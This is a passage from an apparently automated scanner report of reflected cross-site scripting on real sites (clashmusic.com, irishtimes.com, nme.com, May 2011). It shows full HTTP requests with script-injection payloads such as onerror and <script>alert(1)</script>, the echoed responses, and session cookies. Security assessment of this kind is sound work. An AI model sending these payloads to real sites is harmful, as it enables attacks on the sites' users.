<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user a a sidebar-right" id="page-user-a?f2cf1"><a>6d69f2fc0a7=1">
...[SNIP]...
3.104. http://www.clashmusic.com/user/password [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/password

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd1c9"><a>38bd166a4a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /userdd1c9"><a>38bd166a4a2/password HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:08:36 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-userdd1c9"><a>38bd166a4a2-password">
...[SNIP]...
3.105. http://www.clashmusic.com/user/password [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/password

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 37226--><img%20src%3da%20onerror%3dalert(1)>025ae694cc3 was submitted in the REST URL parameter 2. This input was echoed as 37226--><img src=a onerror=alert(1)>025ae694cc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /user/password37226--><img%20src%3da%20onerror%3dalert(1)>025ae694cc3 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:09:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:09:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div id="clash-sponsor" class="not-front not-logged-in user password37226--><img src=a onerror=alert(1)>025ae694cc3 password37226-->
...[SNIP]...
3.106. http://www.clashmusic.com/user/password [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/password

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95d65"><img%20src%3da%20onerror%3dalert(1)>93f2b1f87e4 was submitted in the REST URL parameter 2. This input was echoed as 95d65"><img src=a onerror=alert(1)>93f2b1f87e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user/password95d65"><img%20src%3da%20onerror%3dalert(1)>93f2b1f87e4 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:08:52 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user password95d65"><img src=a onerror=alert(1)>93f2b1f87e4 password95d65">
...[SNIP]...
3.107. http://www.clashmusic.com/user/password [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/password

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b48f9"><a>a34f37c2a37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/password?b48f9"><a>a34f37c2a37=1 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:08:15 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user password password sidebar-right" id="page-user-password?b48f9"><a>a34f37c2a37=1">
...[SNIP]...
3.108. http://www.clashmusic.com/user/register [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/register

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e09ff"><a>cdd9a709dba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /usere09ff"><a>cdd9a709dba/register HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:08:38 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in view view-page- no-sidebars" id="page-usere09ff"><a>cdd9a709dba-register">
...[SNIP]...
3.109. http://www.clashmusic.com/user/register [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/register

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d93b"><img%20src%3da%20onerror%3dalert(1)>477a08ade76 was submitted in the REST URL parameter 2. This input was echoed as 8d93b"><img src=a onerror=alert(1)>477a08ade76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /user/register8d93b"><img%20src%3da%20onerror%3dalert(1)>477a08ade76 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:08:55 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user register8d93b"><img src=a onerror=alert(1)>477a08ade76 register8d93b">
...[SNIP]...
3.110. http://www.clashmusic.com/user/register [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/register

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 247ec--><img%20src%3da%20onerror%3dalert(1)>1bb9b0fc8a9 was submitted in the REST URL parameter 2. This input was echoed as 247ec--><img src=a onerror=alert(1)>1bb9b0fc8a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /user/register247ec--><img%20src%3da%20onerror%3dalert(1)>1bb9b0fc8a9 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:09:03 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:09:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div id="clash-sponsor" class="not-front not-logged-in user register247ec--><img src=a onerror=alert(1)>1bb9b0fc8a9 register247ec-->
...[SNIP]...
3.111. http://www.clashmusic.com/user/register [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /user/register

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25d85"><a>f589e38414a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user/register?25d85"><a>f589e38414a=1 HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4k0bkorgssjj327vn36gicua01; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.2.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:08:15 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:08:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<body class="not-front not-logged-in user register register sidebar-right" id="page-user-register?25d85"><a>f589e38414a=1">
...[SNIP]...
3.112. http://www.irishtimes.com/newspaper/mostread/pagelog.cfm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.irishtimes.com
Path:   /newspaper/mostread/pagelog.cfm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 81131<script>alert(1)</script>ed085a3f4e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newspaper/mostread/pagelog.cfm81131<script>alert(1)</script>ed085a3f4e5?action=1&arturl=/newspaper/theticket/2011/0506/1224296203710.html&md5hash=7800ede9b7c5e8ab828a3aae5f1793bd&headline=Shakin%27%20Stevens&premium=1 HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=48949502.1304949673.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=48949502.1644454561.1304949660.1304949660.1304949660.1; __utmc=48949502; __utmb=48949502.1.10.1304949660

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:07:19 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Content-Length: 417

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 - Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
<P>The requested URL /newspaper/mostread/pagelog.cfm81131<script>alert(1)</script>ed085a3f4e5?action=1&arturl=/newspaper/theticket/2011/0506/1224296203710.html&md5hash=7800ede9b7c5e8ab828a3aae5f1793bd&headline=Shakin%27%20Stevens&premium=1 was not found on this server.</P>
...[SNIP]...
3.113. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.irishtimes.com
Path:   /newspaper/theticket/2011/0506/1224296203710.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bbade<a>55573ebf5a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /newspaper/theticketbbade<a>55573ebf5a8/2011/0506/1224296203710.html HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:00:56 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Content-Length: 267

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 - Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
<P>The requested URL /newspaper/theticketbbade<a>55573ebf5a8/2011/0506/1224296203710.html was not found on this server.</P>
...[SNIP]...
3.114. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.irishtimes.com
Path:   /newspaper/theticket/2011/0506/1224296203710.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 31bfb<script>alert(1)</script>d6f7f03e726 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newspaper/theticket/2011/050631bfb<script>alert(1)</script>d6f7f03e726/1224296203710.html HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:01:09 GMT
Server: Apache
Set-Cookie: AuthCookie_test=test; domain=.irishtimes.com; path=/
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Content-Length: 289

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 - Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
<P>The requested URL /newspaper/theticket/2011/050631bfb<script>alert(1)</script>d6f7f03e726/1224296203710.html was not found on this server.</P>
...[SNIP]...
3.115. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.irishtimes.com
Path:   /newspaper/theticket/2011/0506/1224296203710.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 98721<script>alert(1)</script>4401bc69c40 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newspaper/theticket/2011/0506/1224296203710.html98721<script>alert(1)</script>4401bc69c40 HTTP/1.1
Host: www.irishtimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 14:01:10 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Content-Length: 289

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 - Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
<P>The requested URL /newspaper/theticket/2011/0506/1224296203710.html98721<script>alert(1)</script>4401bc69c40 was not found on this server.</P>
...[SNIP]...
3.116. http://www.nme.com/adcode/hot-spot.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nme.com
Path:   /adcode/hot-spot.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 5f92a-->a012285e929 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adcode5f92a-->a012285e929/hot-spot.html?spot=1&channel=news HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1045; PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rsi_segs=; ipc_nme_core=1304949672; __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmb=112756251.2.10.1304949643; __utmc=112756251; __utmv=112756251.|1=Core=Y=1,; ipc_nme_last_visit=9

Response

HTTP/1.1 200 OK
Server: Apache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:05:22 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 631ed8fa777592278c3c121d623fe1939e0bd012"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3420"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0013279914855957"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:05:22 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
